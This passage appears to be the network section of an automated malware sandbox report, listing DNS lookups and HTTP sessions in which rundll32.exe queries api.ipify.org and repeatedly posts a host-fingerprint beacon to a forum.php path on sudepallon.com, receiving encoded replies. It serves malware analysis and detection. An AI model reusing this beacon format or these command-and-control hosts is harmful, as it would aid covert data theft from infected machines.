                              Jul 9, 2021 03:11:13.421593904 CEST | 192.168.2.3 | 8.8.8.8 | 0x9da1 | Standard query (0) | sudepallon.com | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:14.366192102 CEST | 192.168.2.3 | 8.8.8.8 | 0xb0ca | Standard query (0) | srand04rf.ru | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.110523939 CEST | 192.168.2.3 | 8.8.8.8 | 0x7080 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.921077013 CEST | 192.168.2.3 | 8.8.8.8 | 0xdb11 | Standard query (0) | pospvisis.com | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:20.726341009 CEST | 192.168.2.3 | 8.8.8.8 | 0xdb11 | Standard query (0) | pospvisis.com | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:51.826268911 CEST | 192.168.2.3 | 8.8.8.8 | 0x7edf | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.152251959 CEST | 192.168.2.3 | 8.8.8.8 | 0x8aba | Standard query (0) | sudepallon.com | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.436597109 CEST | 192.168.2.3 | 8.8.8.8 | 0xbaeb | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.744498014 CEST | 192.168.2.3 | 8.8.8.8 | 0xb220 | Standard query (0) | sudepallon.com | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:56.042469978 CEST | 192.168.2.3 | 8.8.8.8 | 0x16b4 | Standard query (0) | pospvisis.com | A (IP address) | IN (0x0001)

                              DNS Answers

                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | api.ipify.org | nagano-19599.herokussl.com |  | CNAME (Canonical name) | IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.173.155 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.243.175.83 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 50.16.216.118 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.225.165.85 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.211.162 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 50.19.92.227 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.136.132 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:12.930475950 CEST | 8.8.8.8 | 192.168.2.3 | 0xc066 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 50.16.218.217 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:13.864721060 CEST | 8.8.8.8 | 192.168.2.3 | 0x9da1 | No error (0) | sudepallon.com |  | 77.222.42.67 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:14.379498005 CEST | 8.8.8.8 | 192.168.2.3 | 0xb0ca | No error (0) | srand04rf.ru |  | 8.211.241.0 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | api.ipify.org | nagano-19599.herokussl.com |  | CNAME (Canonical name) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.173.155 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.243.175.83 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 50.16.216.118 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.225.165.85 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.211.162 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 50.19.92.227 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.136.132 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:18.124867916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7080 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 50.16.218.217 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:21.168353081 CEST | 8.8.8.8 | 192.168.2.3 | 0xdb11 | No error (0) | pospvisis.com |  | 95.213.179.67 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:23.348548889 CEST | 8.8.8.8 | 192.168.2.3 | 0xdb11 | Server failure (2) | pospvisis.com | none | none | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | api.ipify.org | nagano-19599.herokussl.com |  | CNAME (Canonical name) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.173.155 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 50.16.226.23 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.235.121.178 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.235.175.90 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.224.49 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.235.88.121 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.136.132 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:51.839157104 CEST | 8.8.8.8 | 192.168.2.3 | 0x7edf | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.225.165.85 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | api.ipify.org | nagano-19599.herokussl.com |  | CNAME (Canonical name) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.224.49 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.225.165.85 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.173.155 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.235.175.90 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 23.21.211.162 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.235.190.106 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 54.243.175.83 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.450026989 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaeb | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com |  | 50.16.226.23 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.605532885 CEST | 8.8.8.8 | 192.168.2.3 | 0x8aba | No error (0) | sudepallon.com |  | 77.222.42.67 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.759001970 CEST | 8.8.8.8 | 192.168.2.3 | 0xb220 | No error (0) | sudepallon.com |  | 77.222.42.67 | A (IP address) | IN (0x0001)
                              Jul 9, 2021 03:11:52.999325037 CEST | 8.8.8.8 | 192.168.2.3 | 0xdecf | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
                              Jul 9, 2021 03:11:56.056235075 CEST | 8.8.8.8 | 192.168.2.3 | 0x16b4 | No error (0) | pospvisis.com |  | 95.213.179.67 | A (IP address) | IN (0x0001)

                              HTTP Request Dependency Graph

                              • api.ipify.org
                              • sudepallon.com
                              • srand04rf.ru

                              HTTP Packets

                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              0 | 192.168.2.3 | 49718 | 23.21.173.155 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:13.153486013 CEST | 361 | OUT | GET / HTTP/1.1
                              Accept: */*
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: api.ipify.org
                              Cache-Control: no-cache
                              Jul 9, 2021 03:11:13.257200956 CEST | 361 | IN | HTTP/1.1 200 OK
                              Server: Cowboy
                              Connection: keep-alive
                              Content-Type: text/plain
                              Vary: Origin
                              Date: Fri, 09 Jul 2021 01:11:13 GMT
                              Content-Length: 14
                              Via: 1.1 vegur
                              Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                              Data Ascii: 185.189.150.70


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              1 | 192.168.2.3 | 49719 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:13.969963074 CEST | 362 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:14.041244984 CEST | 362 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:15 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 33 38 0d 0a 47 48 53 54 41 52 68 41 45 67 34 4f 43 6b 42 56 56 51 6b 49 47 78 51 65 53 6b 34 49 48 46 51 49 44 31 56 4e 45 68 77 51 43 52 34 63 45 42 45 4a 56 42 38 43 48 77 63 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 38GHSTARhAEg4OCkBVVQkIGxQeSk4IHFQID1VNEhwQCR4cEBEJVB8CHwc=0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              10 | 192.168.2.3 | 49730 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:25.400021076 CEST | 680 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:25.470036030 CEST | 680 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:27 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 4a 51 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQJQJARRABw==0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              100 | 192.168.2.3 | 49827 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:02.391139030 CEST | 5501 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              101 | 192.168.2.3 | 49828 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              102 | 192.168.2.3 | 49829 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              103 | 192.168.2.3 | 49830 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              104 | 192.168.2.3 | 49831 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              105 | 192.168.2.3 | 49832 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              106 | 192.168.2.3 | 49833 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              107 | 192.168.2.3 | 49834 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              108 | 192.168.2.3 | 49835 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              109 | 192.168.2.3 | 49836 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              11 | 192.168.2.3 | 49731 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:26.261089087 CEST | 681 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:26.333961964 CEST | 681 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:27 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTZAGARRABw==0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              110 | 192.168.2.3 | 49837 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              111 | 192.168.2.3 | 49838 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              112 | 192.168.2.3 | 49839 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              113 | 192.168.2.3 | 49840 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              114 | 192.168.2.3 | 49841 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              115 | 192.168.2.3 | 49842 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              116 | 192.168.2.3 | 49843 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              117 | 192.168.2.3 | 49844 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              118 | 192.168.2.3 | 49845 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              119 | 192.168.2.3 | 49846 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              12 | 192.168.2.3 | 49732 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:27.219418049 CEST | 682 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:27.289185047 CEST | 682 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:28 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cNNMMARRABw==0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              120 | 192.168.2.3 | 49847 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              121 | 192.168.2.3 | 49848 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              122 | 192.168.2.3 | 49849 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              123 | 192.168.2.3 | 49850 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              124 | 192.168.2.3 | 49851 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              125 | 192.168.2.3 | 49852 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              126 | 192.168.2.3 | 49853 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              13 | 192.168.2.3 | 49733 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:28.082223892 CEST | 683 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:28.151757956 CEST | 683 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:29 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 4a 51 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQJQJARRABw==0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              14 | 192.168.2.3 | 49734 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:29.094592094 CEST | 686 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
